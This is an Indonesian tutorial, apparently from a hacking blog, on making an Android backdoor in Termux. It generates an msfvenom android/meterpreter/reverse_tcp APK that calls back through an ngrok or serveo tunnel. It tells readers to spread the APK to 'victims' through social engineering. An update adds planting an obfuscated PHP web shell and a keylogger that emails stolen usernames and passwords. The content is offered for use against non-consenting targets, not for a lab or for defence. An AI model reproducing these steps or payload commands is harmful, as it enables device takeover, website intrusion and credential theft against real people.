Tutorial kali ini kita akan membahas tentang cara membuat backdoor menggunakan termux dan serveo port forwarding pengganti ngrok di termux Android.
Serveo adalah sebuah tool yang memberikan kita akses port forwarding.
Berbeda dengan ngrok yg membutuhkan sebuah binary file untuk menjalankanya.
Untuk menjalankan serveo sendiri kita bisa menggunakan perintah ssh karna metode forwarding yg di gunakan oleh serveo ialah menggunakan metode tunneling ssh.
Oke, yang pertama kita buat backdoornya dahulu.
Cara Membuat Backdoor
Pada artikel sebelumnya kita juga telah membahas tentang cara membuat backdoor menggunakan EasySploit.
Bahan yang akan kita gunakan disini adalah Hp Android, aplikasi termux, metasploit dan ngrok.
Pertama silahkan download dan instal termux di Google Play Store.
Untuk langkah instalasi dan menggunakan termux silahkan baca cara instal dan menggunakan termux di postingan sebelumnya.
Jika sudah di instal, selanjutnya yaitu menginstal metasploit di termux untuk membuat backdoornya.
Instal Metasploit
Berikut ini adalah perintah untuk menginsat tool metaspoit di termux:
- $ pkg install upgrade
- $ pkg install git
- $ git clone https://github.com/Hax4us/Metasploit_termux
Cara Menggunakan Metasploit
Untuk menjalankan metasploit di termux kamu cukup masukan perintah-perintah di bawah ini:
- $ ls
- $ cd Metasploit_termux
- $ chmod +x metasploit.sh
- $ ./metasploit.sh
Setelah proses instalasi nya selesai, buka tab baru di termux (new session) dengan cara gulir sisi kiri ke kanan, lalu klik new session, ketik perintah:
- $ cd
Konekan backdoor ke Ngrok
Selanjutnya ketik perintah dengan ketik:
- $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
- $ unzip ngrok-stable-linux-arm.zip
Buka tab di broeser kalian dan Buka Link > ngrok.com
Daftar dan buka dashboard ngrok silahkan copy command yang ada di no 3, seperti gambar berikut:
Copy dan paste kode yang kamu dapat dari akun ngrok kamu ke termux.
Selanjutnya jalankan perintah:
- $ ./ngrok tcp 1337
Agar login terhubung, kita gunakan vpn, bebas apa saja vpn nya (saran anonytun /psipon pro) asal di set di luar indonesia. Jika terhubung maka tulisan akan berubah warna menjadi hijau.
Buka tab baru (new session) lagi gais di termux.
Jalankan perintah :
- $ termux-setup-storage
- $ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=(port) R> /sdcard/backdor.apk
(NB : LPORT= isi dengan port yang di samping 0.tcp.ngrok.io pada tab status ngrok + hilangkan tanda kurungnya)
Lalu tunggu sampai proses selesai pembuatan aplikasinya (filenya biasanya berukuran 8kB) file berada di memori internal di luar tanpa folder (nama aplikasi = backdor.apk
Langkah selanjutnya yaitu meyebar aplikasinya ke calon korbannya, terserah dengan cara apa agar si korban mau menginstalnya, saran “gunakan teknik sosial enginering”.
Catatan: Kamu tidak boleh menutup termux sampai korban menginstal backdoor tersebut di hp nya. Jika kamu menutupnya maka kamu akan kehilangan akses.
Solusinya adalah mengganti port forwading ngrok ke serveo atau alternatif port forwading lainnya.
Berikut ini adalah cara mmeneggunakan serveo:
Instal Serveo
Langkah pertama ialah menginstal openssh dengan perintah:
Jika menggunakan Termux:
- $ pkg install openssh
Jika menggunakan Ubuntu/Debian/Linux Mint:
- $ sudo apt-get install openssh
Jika menggunakan Arch Linux:
- $ sudo pacman -S openssh
Masukan perintah berikut untuk menjalankan serveo masukan perintah:
- $ ssh -R 80:localhost:8888 serveo.net
Keterangan:
- 80 adalah port forwarding nya
- 8888 adalah local portnya
Autput yang saya dapatkan:
- Hi there Forwarding HTTP traffic from https://random.serveo.net Press g to start a GUI session and ctrl-c to quit.
Jika sudah seperti ini serveo siap digunakan.
Contoh link: https://random.serveo.net
Lanjut agar kamu bisa Back Conect ke serveo….
Agar bisa konek kembali ke serveo, kamu bisa menggunakan kostum sub domain di serveo denganengganti perintah:
- $ ssh -R 80:localhost:80 serveo.net
Menjadi:
- $ ssh -R indoxploit:localhost:80 serveo.net
Catatan: ganti “indoxploit” setelah argumen -R (terserah kalian mau di ganti apa) itu yang akan menjadi domain (host) kalian.
Contoh: https://indoxploit.serveo.net
Untuk local portnya sendiri bisa kalian sesuaikan sendiri sesuai selera tapi ingat harus 4 digit angka.
***…”UPDATE”…***
Cara Membuat Backdoor + Keylogger untuk Hack Username & Password
Halo gais, dalam tutorial kali ini kita akan belajar cara membuat backdoor plus keyloggernya.
Membuat Sell Backdoor
Backdoor adalah script yang dapat mengeksekusi perintah sell, dengan wbsell kita tidak perlu lagi login melalui halaman login. Cukup dengan mengeksekusi sell backdoor tersebut, Anda telah mempunyai akses selayaknya admin website.
Untuk sell backdoornya cari yang gampang-gampang ajah gais, nga usah membuat backdoot.
Kita bisa langsung download backdoornya di:
Jika sudak kalian download sell backdoornya kita lanjut ke langkah selanjutnya:
Menyisipkan Sell Backdoor
Untuk menyembunyikan sell backdoornya disini kita akan menggunakan Obfuscator.
Obfuscator adalah sebuah tool untuk code. Tool ini dapat membuat code menjadi beberapa gabungan simbol.
Kelebihan tool ini yaitu bisa di gunakan secara online, jadi kamu ga perlu mendownloadnya.
Cukup kunjungi:
https://tools4nerds.com/online-tools/php-obfuscator
Selanjutya adalah menyiapkan keyloggernya.
Untuk keyloggernya silahkan Anda download keyloggernya DISINI.
Dengan script ini kalian bisa langsung mendapatkan email dan password dimana tempat backdoor berada.
Cara kerjanya adalah menggunakan metode send mail.
Anda akan mendapatkan notifikasi email yang berisi username dan password korban.
Itulah cara membuat backdoor, menyisipkan sell backdoor dan membuat keyloggernya.
Selamat mencoba….